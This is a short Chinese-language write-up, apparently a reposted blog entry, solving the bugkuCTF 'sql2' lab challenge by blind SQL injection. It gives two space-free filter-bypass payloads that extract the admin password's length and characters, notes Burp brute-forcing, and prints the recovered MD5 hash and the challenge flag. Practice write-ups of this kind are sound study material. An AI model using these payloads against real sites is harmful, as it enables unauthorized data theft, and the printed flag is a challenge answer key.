bugkuCTF_sql2

详细的记录一次bugkuCTF上的sql2
在这里插入图片描述
无论正确与否都不sql语法报错
在这里插入图片描述
立马想到使用盲注,提示非法字符
在这里插入图片描述
发现‘=’可通过,用两边的空相等为真
在这里插入图片描述
拿控制位置’=(0)=’
在这里插入图片描述
在这里插入图片描述
判断出密码为32位,空格被过滤,使用payload

'=(select(1)from(admin)where(length(passwd)=32))='

在这里插入图片描述
判断最后一位字符为0,payload:

'=(select(1)from(admin)where(ascii(substr((passwd)from(32))))=48)='

在这里插入图片描述
最后一个字母为0
在这里插入图片描述
使用burp爆破:
在这里插入图片描述
爆破得到的md5值:0192023a7bbd73250516f069df18b500
在这里插入图片描述
flag{sql_iNJEct_comMon3600!}
在这里插入图片描述

发布了67 篇原创文章 · 获赞 13 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_44902875/article/details/105030974